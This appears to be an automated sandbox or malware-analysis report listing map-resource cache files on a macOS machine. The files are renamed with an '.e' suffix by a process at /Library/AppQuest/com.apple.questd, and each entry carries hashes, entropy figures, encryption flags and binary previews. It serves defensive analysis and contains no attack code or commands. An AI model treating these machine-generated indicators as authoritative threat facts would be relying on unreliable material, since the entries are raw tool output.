                                                                                                    Preview: o....d.......v......-..Y..K...vj>8.b$..o.'.........V..._...8...:.>....C.....oq8_.xj@...."'.......Uhz.....B......:...h.(K.+.L. .0b..~.$W.........Q'.+...Q...UOv2`.A4Y[..b..fC......a....._........7....4..*..k....u..{....r7..5.......UC.c.1..uw...d..........W....f..~..'8$.E/.......}T...H......+..4+.d.r......'.....B..H..W{.#............_T.6.....C.....)L.*.9......e#..l...e/%.!....3......F,q.7F......#...&m..c.-^.."..6.#p...*."..8..|.~...pP...{_.r.@....%.p... ..b..F*.3'....U..'.C..H....d....$Uuq*....].5 9..r)...../e..........K..<.>3.......Nb....N]....?.u.5%.......&...i9....u...7.6Bi.Z..EN..SV..Y......6...D.[7...D.A..qN...P.s.~N.r..U....._.....t...n0d..y;.p.e....\..^.+.l.J.....I...@+.....u.9}.#!.l..'t[.N....G..].AMO......g.v.F...J..m..B.=..^....-g...........;N................b~..v.>...Bn.....M/"f..m...3;U..i...&Z......U.~....:N....NXg.r.....Pg&#`..e....m....u..m.-+..JB..5...8l'.P......H.wU..R.....9..+.:...\W.zI......fJ'.hsc._.M.|.q>]3.P....^9..jx.n..9Y..$Q.Z.H$.f..2..e......!g..i(.g.......L..m..
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.RealisticRoadLocalRoad-1@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):154147
                                                                                                    Entropy (8bit):7.9988275291526465
                                                                                                    Encrypted:true
                                                                                                    MD5:70AC22C1BFBC7D2A3CA6A0EC42D92F81
                                                                                                    SHA1:93F4A8976AE5DC8F3E3CB427357914C1F4423374
                                                                                                    SHA-256:BDFEDC78BDBD8FF0F0129F959F4C00471A75A29D18D18EF79F854EF9E58A4C53
                                                                                                    SHA-512:6D8B31E5A4ABDB7C1738123487EB06F91E24DE7688BA26847F92935068B4A4A8FBEDC8AFA5AC12DBAF6F53473359EEBB766E54C07A269864D596F5DEFBD3A3AE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj..d.R.{..a..k..9'.../Oz.1...oL..!..x4g....s.y..wK.......q&.......1Vm....[.67....aT.c..b."...M......;...%.......-X..:oq.W...9..B.(l..?x..7..=B?...h..T..%.<.....<.y.........).]...x!.GL..yh.v.....(]..........h;..?._......F.S|....]...X). ...!..V.(c.R3.x....M..(n|.>`'..].<.........4..1...E.26.b......>.i..............8....%......H.e^..R......=..!9.m1..>T...8...8..#...`d-..%+..y4n...sZ.....I..@..:...C.......iG.S.....w.(*..$...V.x."..n..y..c..pGL..=h...o....(^kH.F....ki....z.5..E...:.w.Ko}|0.csJXw/.?.[."[.mO.R`.....{z..._......C.O..'*.;.C.^..L.v..M....6$.MA....*..4..O.sL......Z.W.........=^Z..;<...;B.rEb..X.cz......C.k.x..k*..?..]...V.o[e%.*..u-.....6N..hY"Z:{{.N.!..J...d.@....O...DI.6..9^.q.=...)4....e../.....S.X.......U..d.......N.]....yL..F\.Z@....b.~W.....P....7.p..3...'5z......02...../r.....b...l.;..JX...AwC.6.l....hK^../8].W...">....w....q#....@# +.ZWKj0d-N..j3.......cdr....!.....G....|$....H.<......$.....q.......Z&M....$.G%..>....*v0....' .J....v?U8~....B
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.SFDisplayShields-CompressedBold-1.otf.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):6690
                                                                                                    Entropy (8bit):7.830568531007053
                                                                                                    Encrypted:false
                                                                                                    MD5:9CAB8D8182066F6AE00D1B06598377BD
                                                                                                    SHA1:93A007BC79799280403FA0A4F961622C5181D673
                                                                                                    SHA-256:10D6F940B209BAC75C15414BF145CDBB6F146D462AD02AE968B8C042CC5E5616
                                                                                                    SHA-512:6F9A1941CB7E357019689C86FA493ACB7F97660BAE98F16AFEB0FF01E88C9B9081B412D7F9CC4F5152789DA9FF8BE8D10D3931FA29E59F2A2D40B7252E278259
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ZP.DSs...RQ...W.........`_I........l.B.u.>..)h.......h6_..>.)....l7.k..h....[]9.Q..S.T.?..^..`.w'].....V3dx......C....3X.Q.'.^8...*.uoH0..u.9.....*4h..3J.v......#..j.T.&\6.....p.3......k..fZ..!...H...KB.f.$..|..8y.YA|..8y.YAG.cC.....".....=V..<.%a.\_)..E.{.qq..r.P.........%`B'*..g[...+.......v.[m`;.C\...m...O.*..',U.<V........V..<.%a..L.D<.+....i[.#....>5.{eJ....<...+....<.~....\.c.S...>.Q3r......t...7...%.I7H#..%...c..v.1..a.*._......&..N.(.e}..!......t.c.. ...R......=...f]....}:Z..ov.9XF....2...I........n.~V.5i...~.....7..... 6.......c./......vt(....I...kq.\uL...qc...{..x..(Pf..*5....xJ...,F.........y...ol..d........%.o.b&j0...T...zT.8K.....&.I...;.q.J!..1o.....J.g...."e..-...8D....`....z..C.J'?..:......t...DA/.\>.:..zT.8K.....&.I...;.q.J!.B.~......%..!..8.<Q..[..D.....w.u...sM7V!M.=x{(/...,X%...B...C..l....5..S.*..[..Z..!O+.'l.S....4.9F:v...E......@j.UN....O34.....5.......M%......w....G.......Bh.n.l..3.:.P.@6.?.:y..@.....X.._N.-..<..Z.J. .H...t<.=..@...`.\T..v.....\...}.)...B...X.q.
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.SFShieldsCondensed-Bold-1.otf.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):18115
                                                                                                    Entropy (8bit):7.919512059171894
                                                                                                    Encrypted:false
                                                                                                    MD5:8B0C33E3F320926C4A06FAFB340D3C15
                                                                                                    SHA1:8EAB8819A058E25A180C30F7401C2867B8AEA458
                                                                                                    SHA-256:A91D7F17D2A000C758909BF40418A496343A264B8DB324CD4DE1A43037E34FDA
                                                                                                    SHA-512:591CC3F94D9BA7842C4A4D20CC5D506BBA237A9BE9CF2805BDC24027ABFBA2FB43BF633F87FFC2010B878059043ECF44E3791E4DDE33FEFB537024EEE6416FE8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: B'IP..[>...n....../1.....f.Tb.b..\.....:c..............8.{.A.Z..U....OX.v....?..^T...w...E.../...z..V.k).gF........L.d1.3dx.....qY#F#....Q.'.^8.u.P.k>8.p...k4..;..M.]m.<..;..T|r...T...5..6..N....|LU..=...#...(..'oX'.^`.y{...K...{...T..'..K.................V..<.%a.'...m*......J.................w^P...]..?...N[..:<.C.Y..m..4...........C9.g.T7...G.WbF$..P...]..?.^Q................................................................s+A7..*...~wX.u..%.. ...ES.O.........................1..2n.dR'....rO.J....<......d...~....\.c...[M..^..;!........bD..Fp.Ut..-T\...F.._.%....w.#..1..]..p...?.H...f.:...Z^\..#.l...@.....L...R..b....{......b....=m.(.'.B...ev.....W...3..t.........{...C.[.c.].D..)..@..........y.&.,JV.W..i..[.C..k,V....*^ca..I...G.9.N.=....l...On.8...../6s....'u....^...:b...g..e!`N5..;.i.\.....!....."..Z...\}.......C..... 2.n3).y.J.$...g.kFL.PS....~...].VX.]}:.hN.\>UR..OcJ...`...I6.mt...B.6.N..f.i.\.....^..+.... ...;......T......l.m..t^..................7Y.#l.B.f..E....Y.. ..P.......:.....
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.SFShieldsSemicondensed-Bold-1.otf.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):18195
                                                                                                    Entropy (8bit):7.923241818066747
                                                                                                    Encrypted:false
                                                                                                    MD5:DDD0DAFD25D636ED1CBCD8A35376D118
                                                                                                    SHA1:87D88E14A7F68F11CDF2677CCB4AD6B79CE048D6
                                                                                                    SHA-256:C91DBAE5DE015FD44BA37FAFB30314CA2990E461924A5A15173FD58A4C807AD3
                                                                                                    SHA-512:EDC469EDAC6FFC9033A2FD2CF830CF1733FFFEECFF2A0C03ADEA98307B97C6B7B132D62F781D955B432F060AAC6D063F45444761E1DA61A43DFE2F1218A4A1A8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: B'IP..[>...n............V.F.Z...0lkC...Lc..............8.{.A.Z..........v....?..^T...w...E.../...z..V.k).gF.........!F..3dx.....H....s.g.Q.'.^8.....}...p...k4..;..M.]m.<..;..T|......A.....\p.;..UY......!O..XF..'....!^`.y{...K...{...V....Un.................V..<.%a......7..f.....................w^P...]..?n#.."...<.C.Y..m..4...../.i....7.l.+...RG.WbF$..P...]..?.^Q..................................................................M...*...~wX.u..%.. nd.8K._.........................1..2n.dR'....rO.J....<..j..]e..>~....\.c...[M..^..;!........bD..Fp.Ut..-T\...F.._.%....w.#..1..]..p...?.H...f.:...Z^\..#.l...@.....L...R..b....{......b....=m.(.'.B...ev.....W...3..t.........{...C.[.c.].D..)..@..........y.&.,JV.W..i..[.C..k,V....*^ca..I...G.9.N.=....l...On.8...../6s....'u....^...:b...g..e!`N5..;.i.\.....!....."..Z...\}.......C..... 2.n3).y.J.$...g.kFL.PS....~...].VX.]}:.hN.\>UR..OcJ...`...I6.mt...B.6.N..f.i.\.....^..+.... ...;......T......l.m.......l.................Ak......p..#.....=C.l.....7..*.?.
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.altitude-783.xml.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):150779
                                                                                                    Entropy (8bit):7.958919693498331
                                                                                                    Encrypted:false
                                                                                                    MD5:C8D01DD087CDFE93269D08F5D3ABD13C
                                                                                                    SHA1:B64B8DD6134DF524F243D01E38E2E27719BC4DB1
                                                                                                    SHA-256:24983A56356927AE7826EE6E87FD9E133CE72488BBF69F0D38775CC59B66852E
                                                                                                    SHA-512:1AB8041C348AA4B35A04243B0B742DF54C1EC2DF704E1EDCD32858451D9E27700AC5533EE45238DF597F7B5E8D6A30DCB75F014CECEE81A5EC8CF2A9ED8451F9
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ...#......}PmZ.C....n..Yj.....n....@..wVptHCf3............a(...Kw....W}...M...w..s`C.g)...........g."..1f..]....+....T...J..-.btK..Jn.4~...@.....i..I-rl(u...l.Y....6...Gu.k..D/....Mm......Td`:....e%PE.\N.....}.=g.......GE...c..%...I.i..I-rl....x.._f..]....+....T.....;...W.Qy..>..C...N5..M.3K.U+..V;.^...C5u..[.. U.u=...........GW,..}.*g..-....+....T..t.i.8.K:'._..T2..i..I-rl....x.._f..]....+....T...J..-.btK..Jn.4~..h.....9.7..Z..BH.:.`W.[O...?!.....7..k.#.+rzB.1...2].x...:..|.mqwz..i...`P...6_..v...z1B....r.h.o..7.F.5+.\.=Pr.T.q........d..:A.......:=dl....y.N".GiQ......DNh.<B72./...[...Bl.E...E4...Kl..J..I.7........N.f..]....q.q..h.........[V$7L{.`....s.X8.-......P.;...5;._...4..C'~GCG.L.>f_$^........q|...d......'....pX...o.l.....}...[..\.....[O...?!..u.L..u....:..|.mqwz..i...`P...6_..v...z1B....r.h.o..7.F.5+.\.=Pr.T.q........d..:A.......`.Ff..alw..3>..Q......DNh.<B72./...[...og......4...Kl..\.............N.f..]....q.q..h.........[V$7L{.`.<T...`.....a].Wz....;.L....a...\c...n.w......r[.
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.cemetery-15.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):33780
                                                                                                    Entropy (8bit):7.990692337129014
                                                                                                    Encrypted:true
                                                                                                    MD5:AA09F16D3E6ED22CBE630C71BE00872E
                                                                                                    SHA1:7956C9E7F4D13DE000663D8615019CAEF6ADC17B
                                                                                                    SHA-256:84C9AF546E18D4D122954D9BC97231331988EB2ED6879DBBC7F025E02E6C4D13
                                                                                                    SHA-512:B9F1CA25387B54BC0CE5C36CB59C452ABF11707EBFC4017EF62A2CF317300F4A6292477A8C5B68447EF3680117C7BEAC3D8A980789BB9BDC396A4002D3C9658C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj>8.b$..o.'.......1V..'..1...oL..,.....%1..........._m.n.Y..I...p.P6....Z.....W.Gs\.p.....&{;:o...d;.....8@...........d-8..F.+XE+`e..~..?...".5..r......R.......{.;....\.......Em...E....j.M.....z.|%..........J...$..dlz...g..Hm...8.Jd.]~.;.e.=63z..f0...2....o...0...#;2...J7D...<...~.......y.mUJTzO..GS.M=.sG..Qt.p9....&r..j..:.3i..%.U...Z..Y^!7L..M.0...`..|....~...H.t...\......r.i ;.EvFi....@...Pz..k.../_....]...?..%P.B...{........QJV.UN.....$N.D.3M.(AU...~.5.{[...g...oL.7...."..j....#W.......{.c...M|V..H....r...(.../.......F..{..-..-..>..yF..9.HH....7..{...qs..;.U..B..=.......TG....X...s:..t.w..C!./...\f.5.P.j....7OG.Y.._$J.+q...*.....%.g..........t...l.......a..........(.}.I......b......W.g.A.p_.[....;.EbW.....~... .......q.t..r......`..:...]"+.......z.26y]v..cv.OZ....[.:?.*<..O....j..(.1...OWwZVs.9...~..a..n..,..o.C.Fd..W&;f.j..\....L.....lq.Uh.b.!_.5..Gc.i.L!..\....M(..\GZ6.p.8.z....~}#=.^N.;3..@..Z.L4A.h..v.t.....%...P.....1Y..%.|j........J.P......Z!~.^
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.cemetery-15@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):71558
                                                                                                    Entropy (8bit):7.9966925954784385
                                                                                                    Encrypted:true
                                                                                                    MD5:B2F147323C0AB4E060452D54269125FC
                                                                                                    SHA1:8FCF26D5009CC022E54B0231037C78135D380F5E
                                                                                                    SHA-256:117DF9B2ED8A3445E1541F97F1AED6B57B84931FABC2574D213202A2A5E16180
                                                                                                    SHA-512:8537A6A8F9B14F96B1914F7260388A624523B66DD2E2B5EE381C7AE4790043771965A17B189C72C3E3A61D758898AA91E7C42241A7484FE61EF4CAF62071DCA5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj..d.R.{..a..k..9'.../Oz.1...oL..!..x4g....s.y..w].@.%.n..*.x.r.A&*..]'A'.....k.].(..7p.....vV.f.8.b^[...w...%.0d..+].'NC. ..g..f.hXh...z..{..w...]...n.+d....w].c2......a.%..|.....L`.]..b...C....t.l..ndG...:&..K../QT3..uoO`}.F.p.a....+=I...:...C.@.....x<....[............h.l.k.R..MZR"@..F.~...M.....A.g.)..DIo6..}.............!Bz'..u@....I..V.M..De....~..F.~.s...t.wO%.64..a.....kl.^....?...HFVB.R..l...a4i..0.;.m.Yp..#J.@..`..e.C....Z...oX..4...6..........5..zM0X<D.7..*..b...&..c...1.i.pH..t.7.&.......rH...............i..o/9Y..fNb.N.........4.%.1.O.S_..RA$.^K.R~.^.70....z...^.+...4.g..Qc....2.p+L."`.....^.u.&.b...6.w+.z.......f....1...>..,..;..:.........7Zk.Ez..k...$JOJ.7?..n.q..X...^.....- D..7%w..9D.O.p@.5.b....g...9CW4.k...qJb...G9...8&...P..^~_...P.K.. ...(7.:.qt.<'...Hm3..<..s..xR"..0..!..8.....f\.8R...6...b.U.z...]7..3.'..#a(.X........-Q}..v....V`]e.T.._0.+g..@.......zS8.}q..|=.Q:C~&6=..)kf.....U~z.K...\9*o...1......y....{.{.2."E..D..]...6Q.Q...p$..S.[
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.clut-night-2.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):9578
                                                                                                    Entropy (8bit):7.95871280405609
                                                                                                    Encrypted:false
                                                                                                    MD5:34EFFAB0C0EAB2BE4B852CB7CB0FF5F8
                                                                                                    SHA1:37CE57484861B462E4B071322070EE73C95359BD
                                                                                                    SHA-256:79E1A97684AFAA6EA06CFBD1C562B333CE1E153B547A5F6A0BF33A3C39C900F9
                                                                                                    SHA-512:4AA91F1CAFAE400E5F0EF9009C652D6E2FEEE9013C3D5C54E6D7E63CAD33E1CBF13C2F4A2DE1FBC70C635C16CDF8C0515F2FCA3869300401BFEE738FD29CDFBD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj...........A3?.\..!oi'.W1...oL...1......b....rf+...2..Q.......`-....`(Q..9.M........x..-..W...8..K...Nt..v}~....O.V..m..1..E.L.|.,_~{..)~...e..3..@_.]......Bp".d8%.......C.;T.0._...q.....]8y...F..yv.l7.!.>.;...]b....O.2....c.........R#{....rC..h.Dl.fe.z. '..@....x.....3=..,p.v...A.]%..,.0.2.o?.^_....M.t.S*+-...n.4.v.D......*..cGw...x....'..C&d...?7%."..=.0...s.YS..lz.Q..NI}\.|...#|>....p...@Q.fw.....vpC.(.}...J.3...Z.8..^R..O....oy$..jx....[...O.i....L.3.F..-=o^.[7(.P%2..+..\."GC%[........nc...0..'h.../...yN...O........-....D=.\.=.Q7......{.V....Y.........U....r..=8.#.~b.....q.N.?J.V....kR>q=.UC.3p`&....l.Q/.**....d.I........UC..A..s.}lu....3.';x+.......H".7..........5...~.}[......@E..E..Y......{.......4..?+...}<.......w=E..0 '.T..4.X.*)..:#..5.x......i....8.....r...=r.n..3E.......^ rm8.i..\.~;f..l....|..R..}.......D...k\.#....y..z.O~..Ke'.|.q/;1...8.\..#..s4.;.J..=.O.?s..q...kZ......X..[W..% .{....&.?R.5.&...Q.5...H........'...O...*...! ....%..3.\`W.?A.
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.concrete-17.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):25355
                                                                                                    Entropy (8bit):7.987874327519291
                                                                                                    Encrypted:false
                                                                                                    MD5:0CBAF4B23A4672C2000DAFAEA44D37F1
                                                                                                    SHA1:6A75C539975143E838BF38345A6908F239C0AD69
                                                                                                    SHA-256:60C0E2ACE50273300E115865FBEED00DEB88263090055ED8D71390D0589DB43E
                                                                                                    SHA-512:30CC0150772F8D3550EDC5AE3650BB8D866140E99DD8B114EFC48419AD41E52E0FF5D06C0A7A9A8CEAE99EB2E4BE1EC59265E6E36E39228826663A682A74C7FF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj>8.b$..o.'.......1V..'..1...oL..,.....%1...........XD.s.pp..*lD..!b...Aa.xI"......s... ..R.Q........>....l'....Rg......G.j.>.....w.f.. .......*O.......O.............O..F...m...w..........A..2V..C..X.C.?.0d..#......m....b..........9.5..S........\.qR\......5C...tu.E...DY.C....2..b.O+......{..`..[.J.t-..%w;D........v.......uG.X.qxZ4..\V.#2.......y..n.@..R.y.|.$..4.........&..o...y!%..K.w....Z.X..=O.W..3....@Y.3@z.m.I`...Pw.....r?=*=.....T}d...............a.n..P.y..KFZ`Q.&!..i....=....&/........x. ...c....H..x..:a.okhP...[..&lC.y...2.V...9.....7.=.o.......$?..4vM..F..f.QZ...F-......^....|..7.:.j....+......l.tB.0:....SnY*.=.R...9.!"=..2.S.`........4.n.Y....$..H...4z..!.zLi..X..\/.....V<+.N&..=PJ.....z.>#...}.`..06w(..._.q..Lh?...~1##.......^...^.....1..;.GA..-......Q.....Y.N,...........WN..UXv..|.X.`....@d.g..C.|....8.h\.....].....~U....tU.bq..P.,.[...w.x.0..^.3...\.Q..&..f...)0Rm...hT...X.W.....r.0.u/..a.0......s...o}..4.n.P/_.....S....=..}.+....f....2.#Q.$.
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.concrete-17@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):91711
                                                                                                    Entropy (8bit):7.997566554726138
                                                                                                    Encrypted:true
                                                                                                    MD5:ADA6E863C4517892FC6E10927E75A2F9
                                                                                                    SHA1:24A3408AAAE04E262C78BDECB81FC548D7085ACA
                                                                                                    SHA-256:C6F1F7CC56F9AC75E5223487EC636F3CB77135E42E0698CE9B09E804EA49502B
                                                                                                    SHA-512:32A3B0F5C504F594D11746C8AABC390BBA8CCBC2B2278FCF11925EC924E02FFFA0710A9186ED8467D20E4C543BFE2917BFA35B34B8AA1726B8C281F9D6652470
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj..d.R.{..a..k..9'.../Oz.1...oL..!..x4g....s.y..w[.%..FJ..:b..Q..8...Uw!...c.....C....g..2..."..G.....05.e.Bp..5.......[Nt~.rt...k.i....2.......q.7..8?_...]+e.r...)mx.)..+ Y..15mb....O.W3.GX$......8....R.2..5....X..!..W..._...p?kem+6+.d-....f....J.....4.j...m5.$>KM...|0`.{../....3....!s....!.G....F....._...ab..q..-..*.].Zbz8..v.=...y.W'Msn..q.k........T^,[...:........9j..0.%.l..).D...s".........o.....p(..<.H....._........%NRZ..v.2Zs...PAG..u.6.......I..Uc......U...V....o....^...E.....l.t.`T...b...Z.q*.!.{E^9....+............J..q../.6 .e}..9W.U.67.N..a.DP.....J.N...<...I.rRC5...M.wgJ..L.......Mc.....\.....F./..1J.NM.....E.....$.^.j,...b..9..n...$i..K..e...A..#.G.i..n.c..}..9.=.7VE*..Z..t...j....n|.$..1....E........)....EU.s....RM.T{%E3....#,'D..=C,......r.d..eP.....C.xDZ..F.q......4.^P.q....D/......C.A..?}.r.............r..........y..._..E.jt.^...0.......V..VB.}....UK.X........:&.\.../,_MA.8........q....<...%Y./.UY"...:6&x...t.W...=.h5./i.{............n6 .
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.golf_course-15.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):34324
                                                                                                    Entropy (8bit):7.9911673816305955
                                                                                                    Encrypted:true
                                                                                                    MD5:3F7FCC3DDEC675B604AA6320764031A5
                                                                                                    SHA1:C1C700359C443A85F562DE5A3120AA0DB65E31B7
                                                                                                    SHA-256:6F3EBFD280A5FE18165F787E2A0F91309A4B535E316BABAE883FCCC9FE56E009
                                                                                                    SHA-512:BF6142C58D41DEB511242CBBD59EED63501195941359A8A0BC8C0FB26955C4F6E9788A458DA492F048B3D51F437636BCCD872A995E0C70BFE8DACD7F73E2CECD
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj>8.b$..o.'.......1V..'..1...oL..,.....%1............*B.m.ySQ......& .a...{...Z.0-.lU.....}<.....r...=R.F...A.9..o.Q/......'.".o.....@U......j:...".pVM.Z.(....6.e.G.FZR.`.hS...d.I..0p..[...Ff.;..I...../....G}.0{...,..L...cS......=..r...x.J.O....l7....o.6=.E..Y.-.....M........V.....wU3AX....~#.....a.....N..2.[>.....8Yl../...RN...Z.....p...^#\....*.k#S...<.........}.R0.......@.....c...:%......fMi?.o.. .S....$.4.Q5....G...D..=D...).o...n..g.h%`K..>x.&....c...F.C..~^..f@.!T1.{..2...5...4.v..&o..`...*..8..m...~...?ED.M'.(=.....``.v..Pp..Ch{b.........Z..e.....Ui...=.rE.]....q.@.En...D..{...<"...........K/O......&...v..t:.|......ol=...>..qQ.....ZR..`..sEDh.Axr1.A.6.1&....,Rz..Z.e......8..!.%...D....x...q...[.D..........l..D.@.W...V.a......b.1.X..].F.JE.F.COt.,...d...9..T........B.+....2o....E.4y<.g._..-.7W.....:.b..#....3k...H.=l.........#.....up..!.D....."(.'.2....J...1...Z.=.}*$..<v.@.O..>_D..v........./......U<o....!.\.<.....QI1... .Kt.x..B.d..j.96p.1,.k...O.
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.golf_course-15@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):73198
                                                                                                    Entropy (8bit):7.996891409088813
                                                                                                    Encrypted:true
                                                                                                    MD5:DC9DE1341FDC4EF56BCA568B21FB026C
                                                                                                    SHA1:D242C6318989BDEA3506B238DA40AD5D362846DA
                                                                                                    SHA-256:C5372259F43EFF5196D57281F8B5ABADAB122EFE0312A87222E050A6C77443CF
                                                                                                    SHA-512:5D1834DF7DF33DDCF2E4C1FD7C51ED73C98AC870D61385B30C64D0A9F4049B5C6545EAD848D0098E0637B556D3B9B69F1ABE867A43D38C1251C077E8ACB6B3C0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj..d.R.{..a..k..9'.../Oz.1...oL..!..x4g....s.y..wN....RT...6./.3h.._N........9.o[g.....(.xA.:..ByOiD.a.*...[".l2.a.}.D{S/....r.Q........eCfp.O4..?....0...'..S.i..xz.&..g....PG..Dn.....@k.{#... .<..Vj6..\.5.S&...+.nb..*.XNJb.7..q.~.m........>...#..5R.U..dU..ea1./;...].Q/:.c.3..D[.....3.... H...,..&...SM.,ko. .j.[......T..4...$.N.z.F........pY..6.J.Y..t....|)Q.............._..+,...;.(.46C.....f.9.?H<.&..Q@w....t.*...'s...U.3..X'.1.y..}B..$..o...|..G+....Qay.p..p....w.ftH.<.^#2.%.R..'.....J.d.5.2...f......V.u@`G...U.W`....x...Z..t.!.7..&c..M}.X.T5aS7(..w;?.9..Q.7 .....6D)F..n.;}...m..5!.L.j.b...p.%1..[.....]/.b.....}...I...=.3.b. L] ....|T...Q.{.....5...`^......]j......l..{.E.U....Wv....{,.gBoi...g.....f.g{W?...........*.!F.Q..eR.{wo..h4..1.\....R.....aCq.wl...}..........qc..L..J.f.e....z..t....W......r.;..r...^U..#.PkD.!}.[...v.e....1...`...@OK.i..R......,.w.`4...|=..6....|.$.E."....K............T[{..,s9..054.6.....;.93W....w.U.fP..$..G..h.waB.N7....#..J"p.
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.land-18.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):698
                                                                                                    Entropy (8bit):6.5458730673936
                                                                                                    Encrypted:false
                                                                                                    MD5:17F3059150075AA8392A03B2AA60D4D0
                                                                                                    SHA1:EEC2FF578B99E6F7E15DB51CACC69A927120CE3E
                                                                                                    SHA-256:3BD6AB5184AFD50EAC736737E7AAF60EE14B88308A8F431081015C3D3B58CB2B
                                                                                                    SHA-512:125838A1EE6D258F46EAB3180A1E1E322F1DFBBB8F9D0BA41BF064BAE0FBEB471456F462F437B703706AF22DC0760E0CE470EB2EE61A97A7F325E03DDD9E1733
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj>8.b$..o.'.......1V..'..1...oL..,.....%1........6.....5..W.....u..}7<.6Y...~[...T.fU......x..?c...+..EVaB...&..0..Ve%...-...`.<..i....\..QMs?~...Q.........._....-...[..a..la1Z..?..$.L.V1V.3...i.F".F..`rjQ.Og.#...uK8.m:7&..n.......y....".J.+..i^8...<}.....V..+..EVaB...&..0..Ve%...-...`.<..i....\..QMs?~...7.Pm.!....._....-...[..a..la1Z...y.....a..lsj.7Xy@..W._..................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ.....................................................................................................................................................
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.land-19@2x.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):1074
                                                                                                    Entropy (8bit):6.828879090271537
                                                                                                    Encrypted:false
                                                                                                    MD5:6A7055B5FCAA18B5D4B23C373B16AD40
                                                                                                    SHA1:F4135CC721B9BCF1631336BE1725BA65EB944E80
                                                                                                    SHA-256:D9F8229CE9F87C52A9F61E6848E9FF29E7C10B5A17B32261420DAE8EB5574C1E
                                                                                                    SHA-512:D8C1010DA1172EFBF1C00C63ADA9AC3F2B14292194B2989FF4A3A5626C7BD9971BDA6B7EB41687346DDD01D25ACF698714C191B41ABFCE8AA5ED2A18F34C2B11
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: o....d.......v......-..Y..K...vj..d.R.{..a..k..9'.../Oz.1...oL..!..x4g....s.y..w.. ........l.......E.7I...MUa....k.dY.1....#...Z.........K.4...+4}{&i..k.C......p.).....E..@..DnO.$.....)...j..\s.u.5..,.?.C.*B.p.).....E..@..DnO.$.....)...j..\s.u.5..,.........K.4...+4}{&i..k.C......p.).....N................K.4...+4}{&i..k.C......p.)......NW..={1O.$.....)...j..\s.u.5..,u.hf..GC.I....I.E..@..DnO.$.....)...j..\.rt.....E.[....o.......9.SR4R<~2....]P(.........p.).....E..@..DnO.$.....)...j..\s.u.5..,.........K.4...+4}{&i..k.C......p.).....N................K.4...+4}{&i..k.C......p.).....E..@..Dn..IV.2c.)...j..\s.u.5..,.?.C.*B.p.).....E..@..DnO.$.....)...j..\s.u.5..,.........K.4...+4}{&i..k.C......p.)........8.............K.4...+4}{&i..k&.-.q......_..FK...!N.~bu.. ...,..................D....|.......xV..ZB..ig...d...S.,L.....E..sv..xv..#0..^u..jI.....L.....o5..R7..y5...=..i&...x...&.......ay..:f..y\..@N..9U...S..Gs.......pJ...........................................................................
                                                                                                    /Users/ben/Library/Caches/GeoServices/Resources/.land-carplay-1.png.e
                                                                                                    Process:/Library/AppQuest/com.apple.questd
                                                                                                    File Type:data
                                                                                                    Size (bytes):610
